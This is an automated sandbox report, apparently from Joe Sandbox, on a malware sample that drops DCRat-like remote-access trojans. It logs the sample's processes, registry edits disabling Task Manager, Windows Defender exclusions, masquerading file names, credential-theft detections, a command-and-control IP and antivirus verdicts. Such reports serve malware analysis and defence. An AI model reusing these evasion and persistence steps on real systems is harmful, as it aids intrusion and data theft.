                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeQueries volume information: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe VolumeInformation
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeCode function: 0_2_00CCDF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_00CCDF1E
                          Source: C:\Users\user\Desktop\kBY9lgRaca.exeCode function: 0_2_00CBB146 GetVersionExW,0_2_00CBB146
                          Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                          Lowering of HIPS / PFW / Operating System Security Settings

                          barindex
                          Source: C:\Windows\SysWOW64\reg.exeRegistry value created: DisableTaskMgr 1Jump to behavior
                          Source: C:\Windows\SysWOW64\reg.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgrJump to behavior
                          Source: mOBsSQwwQhAobhYfNDABCsnt.exe, 00000018.00000002.2765072428.000000001C7CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                          Source: C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                          Stealing of Sensitive Information

                          barindex
                          Source: Yara matchFile source: 00000008.00000002.1574023046.00000000135E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: cef_process.exe PID: 7700, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: mOBsSQwwQhAobhYfNDABCsnt.exe PID: 576, type: MEMORYSTR
                          Source: Yara matchFile source: 8.0.cef_process.exe.b10000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000008.00000000.1459515251.0000000000B12000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000003.1300294419.0000000004E3F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\mOBsSQwwQhAobhYfNDABCsnt.exe, type: DROPPED
                          Source: Yara matchFile source: C:\RuntimeDll\cef_process.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Java\jre-1.8\bin\RuntimeBroker.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\WindowsPowerShell\Modules\lsass.exe, type: DROPPED
                          Source: Yara matchFile source: 8.0.cef_process.exe.b10000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\mOBsSQwwQhAobhYfNDABCsnt.exe, type: DROPPED
                          Source: Yara matchFile source: C:\RuntimeDll\cef_process.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Java\jre-1.8\bin\RuntimeBroker.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\WindowsPowerShell\Modules\lsass.exe, type: DROPPED

                          Remote Access Functionality

                          barindex
                          Source: Yara matchFile source: 00000008.00000002.1574023046.00000000135E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: cef_process.exe PID: 7700, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: mOBsSQwwQhAobhYfNDABCsnt.exe PID: 576, type: MEMORYSTR
                          Source: Yara matchFile source: 8.0.cef_process.exe.b10000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000008.00000000.1459515251.0000000000B12000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000003.1300294419.0000000004E3F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\mOBsSQwwQhAobhYfNDABCsnt.exe, type: DROPPED
                          Source: Yara matchFile source: C:\RuntimeDll\cef_process.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Java\jre-1.8\bin\RuntimeBroker.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\WindowsPowerShell\Modules\lsass.exe, type: DROPPED
                          Source: Yara matchFile source: 8.0.cef_process.exe.b10000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\mOBsSQwwQhAobhYfNDABCsnt.exe, type: DROPPED
                          Source: Yara matchFile source: C:\RuntimeDll\cef_process.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Java\jre-1.8\bin\RuntimeBroker.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\WindowsPowerShell\Modules\lsass.exe, type: DROPPED
                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity Information11
                          Scripting
                          Valid Accounts141
                          Windows Management Instrumentation
                          11
                          Scripting
                          1
                          DLL Side-Loading
                          31
                          Disable or Modify Tools
                          OS Credential Dumping1
                          System Time Discovery
                          Remote Services1
                          Archive Collected Data
                          1
                          Encrypted Channel
                          Exfiltration Over Other Network MediumAbuse Accessibility Features
                          CredentialsDomainsDefault Accounts1
                          Exploitation for Client Execution
                          1
                          DLL Side-Loading
                          11
                          Process Injection
                          1
                          Deobfuscate/Decode Files or Information
                          LSASS Memory3
                          File and Directory Discovery
                          Remote Desktop ProtocolData from Removable Media1
                          Non-Application Layer Protocol
                          Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain Accounts2
                          Command and Scripting Interpreter
                          Logon Script (Windows)Logon Script (Windows)3
                          Obfuscated Files or Information
                          Security Account Manager57
                          System Information Discovery
                          SMB/Windows Admin SharesData from Network Shared Drive11
                          Application Layer Protocol
                          Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                          Software Packing
                          NTDS271
                          Security Software Discovery
                          Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                          DLL Side-Loading
                          LSA Secrets1
                          Process Discovery
                          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts113
                          Masquerading
                          Cached Domain Credentials151
                          Virtualization/Sandbox Evasion
                          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                          Modify Registry
                          DCSync1
                          Application Window Discovery
                          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job151
                          Virtualization/Sandbox Evasion
                          Proc Filesystem1
                          Remote System Discovery
                          Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                          Process Injection
                          /etc/passwd and /etc/shadow1
                          System Network Configuration Discovery
                          Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 signatures2 2 Behavior Graph ID: 1533405 Sample: kBY9lgRaca.exe Startdate: 14/10/2024 Architecture: WINDOWS Score: 100 77 Suricata IDS alerts for network traffic 2->77 79 Antivirus detection for dropped file 2->79 81 Multi AV Scanner detection for dropped file 2->81 83 9 other signatures 2->83 10 kBY9lgRaca.exe 3 6 2->10         started        process3 file4 71 C:\RuntimeDll\cef_process.exe, PE32 10->71 dropped 73 C:\RuntimeDll\PBs3ExWWgPs.vbe, data 10->73 dropped 13 wscript.exe 1 10->13         started        process5 signatures6 103 Windows Scripting host queries suspicious COM object (likely to drop second stage) 13->103 105 Suspicious execution chain found 13->105 16 cmd.exe 1 13->16         started        process7 process8 18 cef_process.exe 3 39 16->18         started        22 reg.exe 1 1 16->22         started        24 conhost.exe 16->24         started        file9 55 C:\Users\user\Desktop\zPzZvHLt.log, PE32 18->55 dropped 57 C:\Users\user\Desktop\ykSQugis.log, PE32 18->57 dropped 59 C:\Users\user\Desktop\vZJioLKA.log, PE32 18->59 dropped 61 26 other malicious files 18->61 dropped 85 Antivirus detection for dropped file 18->85 87 Machine Learning detection for dropped file 18->87 89 Adds a directory exclusion to Windows Defender 18->89 91 Drops PE files with benign system names 18->91 26 cmd.exe 18->26         started        29 powershell.exe 23 18->29         started        31 powershell.exe 23 18->31         started        33 3 other processes 18->33 93 Disable Task Manager(disabletaskmgr) 22->93 95 Disables the Windows task manager (taskmgr) 22->95 signatures10 process11 signatures12 97 Uses ping.exe to sleep 26->97 99 Uses ping.exe to check the status of other devices and networks 26->99 35 mOBsSQwwQhAobhYfNDABCsnt.exe 26->35         started        39 conhost.exe 26->39         started        53 2 other processes 26->53 101 Loading BitLocker PowerShell Module 29->101 41 conhost.exe 29->41         started        43 WmiPrvSE.exe 29->43         started        45 conhost.exe 31->45         started        47 conhost.exe 33->47         started        49 conhost.exe 33->49         started        51 conhost.exe 33->51         started        process13 dnsIp14 75 91.199.45.187, 49898, 80 SYSHEAD-ASDE Netherlands 35->75 63 C:\Users\user\Desktop\zlIjJSaG.log, PE32 35->63 dropped 65 C:\Users\user\Desktop\zLeRKKNH.log, PE32 35->65 dropped 67 C:\Users\user\Desktop\wjWAnjWL.log, PE32 35->67 dropped 69 20 other malicious files 35->69 dropped file15

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand
                          SourceDetectionScannerLabelLink
                          kBY9lgRaca.exe100%Joe Sandbox ML
                          SourceDetectionScannerLabelLink
                          C:\RuntimeDll\cef_process.exe100%AviraHEUR/AGEN.1323342
                          C:\RuntimeDll\PBs3ExWWgPs.vbe100%AviraVBS/Runner.VPG
                          C:\Program Files\Microsoft\OneDrive\ListSync\settings\mOBsSQwwQhAobhYfNDABCsnt.exe100%AviraHEUR/AGEN.1323342
                          C:\Program Files\Microsoft\OneDrive\ListSync\settings\mOBsSQwwQhAobhYfNDABCsnt.exe100%AviraHEUR/AGEN.1323342
                          C:\Program Files\Microsoft\OneDrive\ListSync\settings\mOBsSQwwQhAobhYfNDABCsnt.exe100%AviraHEUR/AGEN.1323342
                          C:\Users\user\Desktop\HTmgdJna.log100%AviraHEUR/AGEN.1300079
                          C:\Program Files (x86)\Java\jre-1.8\bin\RuntimeBroker.exe100%AviraHEUR/AGEN.1323342
                          C:\Program Files (x86)\WindowsPowerShell\Modules\lsass.exe100%AviraHEUR/AGEN.1323342
                          C:\Users\user\AppData\Local\Temp\0MaLlOrxiN.bat100%AviraBAT/Delbat.C
                          C:\RuntimeDll\cef_process.exe100%Joe Sandbox ML
                          C:\Program Files\Microsoft\OneDrive\ListSync\settings\mOBsSQwwQhAobhYfNDABCsnt.exe100%Joe Sandbox ML
                          C:\Program Files\Microsoft\OneDrive\ListSync\settings\mOBsSQwwQhAobhYfNDABCsnt.exe100%Joe Sandbox ML
                          C:\Program Files\Microsoft\OneDrive\ListSync\settings\mOBsSQwwQhAobhYfNDABCsnt.exe100%Joe Sandbox ML
                          C:\Users\user\Desktop\MOnylpdT.log100%Joe Sandbox ML
                          C:\Users\user\Desktop\HTmgdJna.log100%Joe Sandbox ML
                          C:\Program Files (x86)\Java\jre-1.8\bin\RuntimeBroker.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\WindowsPowerShell\Modules\lsass.exe100%Joe Sandbox ML
                          C:\Users\user\Desktop\CNRzgtSC.log100%Joe Sandbox ML
                          C:\Users\user\Desktop\CNRzgtSC.log4%ReversingLabs
                          C:\Users\user\Desktop\CfUiBMYm.log8%ReversingLabs
                          C:\Users\user\Desktop\CtGsekUC.log17%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                          C:\Users\user\Desktop\DJEawqoG.log17%ReversingLabs
                          C:\Users\user\Desktop\DhKAQyQA.log8%ReversingLabs
                          C:\Users\user\Desktop\FelIlyfv.log29%ReversingLabsByteCode-MSIL.Trojan.Generic
                          C:\Users\user\Desktop\GWKYIJYf.log17%ReversingLabs
                          C:\Users\user\Desktop\HOdrnIxw.log8%ReversingLabs
                          C:\Users\user\Desktop\HTmgdJna.log13%ReversingLabsByteCode-MSIL.Trojan.Generic
                          C:\Users\user\Desktop\KMBPPFZY.log8%ReversingLabs
                          C:\Users\user\Desktop\MOnylpdT.log17%ReversingLabs
                          C:\Users\user\Desktop\ORagGYiO.log17%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                          C:\Users\user\Desktop\PqvOIQVP.log17%ReversingLabsByteCode-MSIL.Trojan.DCRat
                          C:\Users\user\Desktop\QEeosldM.log21%ReversingLabsByteCode-MSIL.Trojan.Generic
                          C:\Users\user\Desktop\UdNNkMkD.log9%ReversingLabs
                          C:\Users\user\Desktop\UicXeyNX.log12%ReversingLabs
                          C:\Users\user\Desktop\WkOFzhSS.log21%ReversingLabs
                          C:\Users\user\Desktop\WtmFjUlP.log17%ReversingLabs
                          C:\Users\user\Desktop\Yimecftu.log4%ReversingLabs
                          C:\Users\user\Desktop\YmBoVQXN.log17%ReversingLabs
                          C:\Users\user\Desktop\YztwqAnw.log17%ReversingLabs
                          C:\Users\user\Desktop\ZVuWGvdL.log9%ReversingLabs
                          C:\Users\user\Desktop\ZfOmxfIp.log12%ReversingLabs
                          C:\Users\user\Desktop\cmPeMAqD.log50%ReversingLabsByteCode-MSIL.Trojan.Generic
                          C:\Users\user\Desktop\djqniAFy.log17%ReversingLabs
                          C:\Users\user\Desktop\eNXvjbiz.log4%ReversingLabs
                          C:\Users\user\Desktop\hCXTblqe.log12%ReversingLabs
                          C:\Users\user\Desktop\hiNMadse.log21%ReversingLabs
                          C:\Users\user\Desktop\iesEpfvs.log13%ReversingLabsByteCode-MSIL.Trojan.Generic
                          C:\Users\user\Desktop\iqbcNzlc.log17%ReversingLabs
                          C:\Users\user\Desktop\jBpuMXxn.log21%ReversingLabsByteCode-MSIL.Trojan.Generic
                          C:\Users\user\Desktop\jJYMqGYt.log8%ReversingLabs
                          C:\Users\user\Desktop\jWRUMqoc.log21%ReversingLabs
                          C:\Users\user\Desktop\lYDDhZsX.log50%ReversingLabsByteCode-MSIL.Trojan.Generic
                          C:\Users\user\Desktop\owqLTDnh.log29%ReversingLabsWin32.Trojan.Generic
                          C:\Users\user\Desktop\pPutoWtQ.log5%ReversingLabs
                          C:\Users\user\Desktop\rAZKvkEJ.log4%ReversingLabs
                          C:\Users\user\Desktop\tFkkvTtJ.log29%ReversingLabsWin32.Trojan.Generic
                          C:\Users\user\Desktop\uqHSBmkN.log21%ReversingLabs
                          C:\Users\user\Desktop\vZJioLKA.log8%ReversingLabs
                          C:\Users\user\Desktop\vdXshwoU.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                          C:\Users\user\Desktop\wjWAnjWL.log5%ReversingLabs
                          C:\Users\user\Desktop\ykSQugis.log29%ReversingLabsByteCode-MSIL.Trojan.Generic
                          C:\Users\user\Desktop\zLeRKKNH.log17%ReversingLabsByteCode-MSIL.Trojan.DCRat
                          C:\Users\user\Desktop\zPzZvHLt.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                          C:\Users\user\Desktop\zlIjJSaG.log12%ReversingLabs
                          No Antivirus matches
                          No Antivirus matches
                          SourceDetectionScannerLabelLink
                          http://nuget.org/NuGet.exe0%URL Reputationsafe
                          http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                          http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                          http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
                          https://contoso.com/0%URL Reputationsafe
                          https://nuget.org/nuget.exe0%URL Reputationsafe
